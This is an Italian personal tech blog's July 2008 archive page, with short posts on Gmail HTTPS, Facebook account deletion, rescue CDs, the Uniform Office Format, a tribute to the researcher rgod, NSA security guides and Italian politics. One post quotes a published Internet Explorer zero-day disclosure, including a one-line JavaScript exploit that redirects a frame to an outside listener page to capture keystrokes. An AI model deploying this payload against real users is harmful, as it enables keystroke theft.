Passa ai contenuti principali

Post

Visualizzazione dei post da Luglio, 2008

Google Lively

Google Lively

Quando la parola chatroom viene usata nel suo significato letterale! :)

Addio rGod!

I am not rgod. I’m a friend of his named Daniel.rgod died two days ago at that hospital in Catania. It was a surprise and a shock…to all of us who knew him. rgod was suffering of a rare bony marrow

disease, leading to paralysis during his last days.It just took me a while to figure out how to have access to rgod’s website, searching the key on his laptop

(with permission from those close to him) to post this…I don’t know what the future of this site will involve but I’d sure like to see these posts, and some of the

others about rgod posted across the Internet, preserved on the web indefinitely. Just so that when folks google the name of rgod in years to come, they’ll be able to read it all.

rgod web pages
Ieri rileggevo un mio vecchio post e tra i commenti ho scorto la firma di rgod.

Da tempo non andavo sul suo "sito" e come sempre mi sono detto "andiamo a vedere cosa quel diavolaccio ha combinato negli ultimi tempi".

Una volta lì, ho appreso della sua scomparsa ... come…

Uniform Office Format, eccone un altro

Uniform Office Format (UOF) is a Chinese developed open standard for 'office' applications. It includes word processing, presentation, and spreadsheet modules, and is made up of GUI, API, and format specifications. The document format described uses XML contained in a compressed file container, similar to ISO/IEC 26300:2006 OpenDocument and ECMA-376 Office Open XML (OOXML).

The working group that has produced the standard was founded in January 2002, and the first draft of the specification was produced in December 2005. The group producing the standard is open, with 'open-door' meetings, equitable voting by ballots, and the standard document is free.

Uniform Office Format - Wikipedia, the free encyclopedia
Quando le aziende fanno propri termini come open ed universale succedono sempre cose bizzarre ...
Il Dipartimento Internazionale del Comitato Centrale del Partito Comunista Cinese (ovvero il ministero degli Esteri), il ministero del Commercio e l'Archivio di Stato …

Che dire se non ...

GMail rende il protocollo HTTPS un'impostazione permanente

Reblogged


Proprio stamane stavo pensando al fatto che la connessione a GMail, che da sempre è possibile sia in HTTP che in HTTPS, fosse poco sicura. Questo perché non rendeva l'HTTPS obbligatorio come protocollo ed era quindi possibile con uno sniffer, e con un po' di distrazione dell'utente, intercettare le credenziali di accesso alla casella di posta elettronica.
E quasi per caso leggo il post di Claudia, dove segnala che GMail ha reso da oggi la scelta di HTTPS permanente per ognuno di noi. Questa impostazione verrà ricordata per le future connessioni a prescindere dalla postazione utilizzata.
Per abilitare l'impostazione basta andare nella sezione "Impostazioni - > Generali", dove in basso troverete l'opzione:

Finalmente qualche cosa che aumenta notevolmente la sicurezza delle caselle di posta su GMail.
Qui il riferimento originale

Facebook account - Cancellazione avvenuta

Come predicavo qualche post fa finalmente ho raggiunto il mio scopo:
Hi Andrea,

We have deleted your profile information and removed your email address from our login database.  Let me know if you have further questions.

Thanks for contacting Facebook,

Eli
User Operations
Facebook
Speriamo non si siano limitati alla cancellazione dei dati del mio profilo (sto attendendo informazioni in merito)

Stay tuned

UPDATE: cancellate le apps a mano

Antivirus Rescue CDs

Reblogged

Shared by Andrea Lazzari

Una lista, e sul link originale anche una breve descrizione, di alcuni tra i più utili rescue cd ad oggi in circolazione :)

Non vi auguro di doverne utilizzare mai nessuno ma nel caso dovessero servire...
Questi i link per scaricare le immagini dei rispettivi CD:
- Avira AntiVir Rescue System: download iso
- BitDefender RescueCD v2: download iso
- F-Secure Rescue CD 3.00: download iso
- Kaspersky KAV Rescue 2008: download iso

Qui il riferimento originale

Ghost Busters: Zero-day flaw haunts Internet Explorer

This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);
What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode.

Ghost Busters | GNUCITIZEN
Vi fornisco direttamente il digest ;)

Cosa sai sul TRATTATO DI LISBONA?

Cosa sai sul TRATTATO DI LISBONA?

Mi sento di consigliare la visione di questi 10 minuti di video...

Mi viene da pensare come sia possibile spiegare certe cose alle persone, in un recente commento ho citato Gramsci:
L’indifferenza è il peso morto della storia. È la palla di piombo per il novatore, è la materia inerte in cui affogano spesso gli entusiasmi più splendenti, è la palude che recinge la vecchia città e la difende meglio delle mura più salde, meglio dei petti dei suoi guerrieri, perché inghiottisce nei suoi gorghi limosi gli assalitori, e li decima e li scora e qualche volta li fa desistere dall’impresa eroica

Open Source Laptop Tracking Service

Open Source Laptop Tracking Service

Adeona. Looks good.

Schneier on Security: Open Source Laptop Tracking Service
Schneier segnala questo strumento molto molto carino, alla faccia di altri blasonati strumenti a pagamento.
Adeona has three main properties:

Private: Adeona uses state-of-the-art cryptographic mechanisms to ensure that the owner is the only party that can use the system to reveal the locations visited by a device.
Reliable: Adeona uses a community-based remote storage facility, ensuring retrievability of recent location updates.
Open source and free: Adeona's software is licensed under GPLv2. While your locations are secret, the tracking system's design is not.


Testing in corso ;)

NSA: Linee guida per la sicurezza informatica

Reblogged


Shared by Andrea Lazzari

From: Roberto Scaccia
Vi segnalo questa sezione del sito della NSA con diverse linee guida di sicurezza informatica.

Qualche documento interessante:

VMware ESX Server 3 Configuration Guide
Web Application Security Overview
Disabling USB Storage Drives
Guide to the Secure Configuration of Red Hat Enterprise Linux 5
Minimize the Effectiveness of SQL Injection Attacks

E molto altro....

Spero solo che non contengano qualche malware ;-)
Qui il riferimento originale

Giornali e Università

Reblogged

Shared by Andrea Lazzari

Ahime da nessuna parte . . .
Su La Stampa una analisi dei problemi dell’università. Condivisibile nonostante il titolo troppo enfatico (ma si sa, i titoli li fanno i titolisti e neanche i giornalisti).
La riforma che uccide l’università
Su Il Giornale, un articolo che spara una miriade di luoghi comuni, a cominciare dagli stipendi. Secondo il Giornale io (come ordinario) guadagnerei 10.000 euro al mese per 3 ore di lavoro al giorno. A parte il fatto che il mio stipendio è pubblico è vale circa 3000 euro netti al mese, 5000 lordi (la metà di quello che dice il Giornale), il nostro carico didattico è superiore a quello dei nostri colleghi all’estero. Soprattutto, il Giornale intenzionalmente dimentica che la didattica è uno dei compiti del docenti. Dovremmo fare anche ricerca, scrivere, avere rapporti con imprese. Come succede in qualunque paese del mondo.
Ma evidentemente a Il Giornale interessava solo sollevare l’opinione pubblica contro i mascalzoni nul…